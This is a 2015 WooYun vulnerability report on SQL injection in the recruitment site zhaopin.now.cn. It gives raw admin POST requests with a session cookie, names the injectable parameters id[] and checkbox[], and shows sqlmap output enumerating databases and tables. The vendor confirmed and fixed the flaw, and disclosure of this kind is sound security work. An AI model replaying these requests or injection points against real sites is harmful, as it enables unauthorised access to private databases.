乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向核心白帽子及相关领域专家公开 2015-09-07: 细节向普通白帽子公开 2015-09-16: 厂商已经修复漏洞并主动公开,细节向公众公开
注入,厂商忽略,我就伤心了!!!
POST /admin.php/hr/hrlist_edit_submit HTTP/1.1Content-Length: 123Content-Type: application/x-www-form-urlencodedReferer: http://zhaopin.now.cn/Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900Host: zhaopin.now.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*id[]=&interviewdate=01/01/1967&interviewnoon=%e4%b8%8a%e5%8d%88&interviewtime=1&submit=%e6%8f%90%e4%ba%a4%e5%8f%91%e9%80%81
注入参数id[]
POST /admin.php/article/opt HTTP/1.1Content-Length: 74Content-Type: application/x-www-form-urlencodedReferer: http://zhaopin.now.cn/Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900Host: zhaopin.now.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*action=del_allheckbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c
注入参数 checkbox[]
available databases [9]:[*] #mysql50#lost+found[*] db_now_net_cn[*] information_schema[*] mysql[*] performance_schema[*] proftpd[*] test[*] webphone[*] webphone_center
看当前的库巴!
*****ve value(s) fou**********uery used retu**********etrieved: **********rieved: np_**********rieved: np_**********ed: np_3431_a**********rieved: np_**********rieved: np_**********eved: np_343**********eved: np_343**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_3431_p**********etrieved: **********etrieved: **********rieved: np_**********rieved: np_**********ed: np_456_ar**********etrieved: **********rieved: np_**********eved: np_456**********rieved: np_**********etrieved: **********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_456_pr**********etrieved: **********etrieved: **********rieved: np_**********rieved: np_**********ed: np_888_ar**********etrieved: **********rieved: np_**********eved: np_888**********rieved: np_**********etrieved: **********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_888_pr**********etrieved: **********rieved: np_**********eved: np_aat**********rieved: np_**********ed: np_aatkq_**********rieved: np_**********eved: np_aat**********eved: np_aat**********eved: np_aat**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_aatkq_**********etrieved: **********etrieved: **********rieved: np_**********rieved: np_**********ed: np_air_ar**********etrieved: **********rieved: np_**********eved: np_air**********rieved: np_**********etrieved: **********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_air_pr**********etrieved: **********rieved: np_**********eved: np_arm**********eved: np_arm**********: np_armies2_a**********rieved: np_**********eved: np_arm**********eved: np_arm**********eved: np_arm**********rieved: np_**********eved: np_arm**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_arm**********: np_armies2_p**********rieved: np_**********rieved: np_**********eved: np_arm**********rieved: np_**********ed: np_armies**********rieved: np_**********eved: np_arm**********eved: np_arm**********eved: np_arm**********rieved: np_**********rieved: np_**********rieved: np_**********etrieved: **********rieved: np_**********rieved: np_**********ed: np_armies**********rieved: np_**********etrieved: **********rieved: np_**********rieved: np_**********ed: np_asia_a**********rieved: np_**********rieved: np_**********eved: np_asi**********eved: np_asi**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_asia_p**********etrieved: **********eved: np_blu**********ed: np_bluesp**********eved: np_blu**********: np_bluesprin**********eved: np_blu**********ed: np_bluesp**********ed: np_bluesp**********ed: np_bluesp**********eved: np_blu**********eved: np_blu**********eved: np_blu**********rieved: np_**********eved: np_blu**********eved: np_blu**********: np_bluesprin**********eved: np_blu**********eved: np_can**********eved: np_can**********eved: np_can**********: np_canyin007**********eved: np_can**********eved: np_can**********ed: np_canyin**********ed: np_canyin**********eved: np_can**********eved: np_can**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_can**********: np_canyin007**********rieved: np_**********rieved: np_**********eved: np_car**********rieved: np_**********ed: np_car4s_**********rieved: np_**********eved: np_car**********eved: np_car**********eved: np_car**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_car4s_**********etrieved: **********rieved: np_**********eved: np_cgm**********eved: np_cgm**********: np_cgmacau_a**********rieved: np_**********eved: np_cgm**********eved: np_cgm**********eved: np_cgm**********rieved: np_**********eved: np_cgm**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_cgm**********: np_cgmacau_p**********rieved: np_**********rieved: np_**********eved: np_chi**********rieved: np_**********ed: np_chile_**********rieved: np_**********eved: np_chi**********eved: np_chi**********eved: np_chi**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_chile_**********etrieved: **********etrieved: **********rieved: np_**********rieved: np_**********ed: np_cogi_a**********rieved: np_**********rieved: np_**********eved: np_cog**********eved: np_cog**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_cogi_p**********etrieved: **********rieved: np_**********eved: np_cor**********eved: np_cor**********: np_corecool_**********eved: np_cor**********eved: np_cor**********ed: np_coreco**********eved: np_cor**********eved: np_cor**********eved: np_cor**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_cor**********: np_corecool_**********rieved: np_**********etrieved: **********rieved: np_**********rieved: np_**********ed: np_cuhk_a**********rieved: np_**********rieved: np_**********eved: np_cuh**********eved: np_cuh**********rieved: np_**********rieved: np_**********etrieved: **********etrieved: **********etrieved: **********rieved: np_**********ed: np_cuhk_p**********etrieved: **********rieved: np_**********eved: np_cwj**********eved: np_cwj**********: np_cwjyp014_**********eved: np_cwj**********eved: np_cwj**********ed: np_cwjyp0**********eved: np_cwj**********eved: np_cwj**********eved: np_cwj**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_cwj**********: np_cwjyp014_**********rieved: np_**********rieved: np_**********eved: np_dac**********eved: np_dac**********: np_dacarat_a**********rieved: np_**********eved: np_dac**********eved: np_dac**********eved: np_dac**********rieved: np_**********eved: np_dac**********rieved: np_**********rieved: np_**********rieved: np_**********eved: np_dac**********: np_dacarat_p**********rieved: np_**********rieved: np_**********eved: np_dds**********eved: np_dds**********: np_ddsdfsfs_**********eved: np_dds**********eved: np_dds**********rieved: np_**********rieved: np_**********rieved: np_*****
>>>>多到sqlmap放不下了<<<<<
危害等级:高
漏洞Rank:10
确认时间:2015-08-18 12:57
我们会尽快修复,感谢白帽子哥哥提供的漏洞, ^_^
2015-09-16:已修复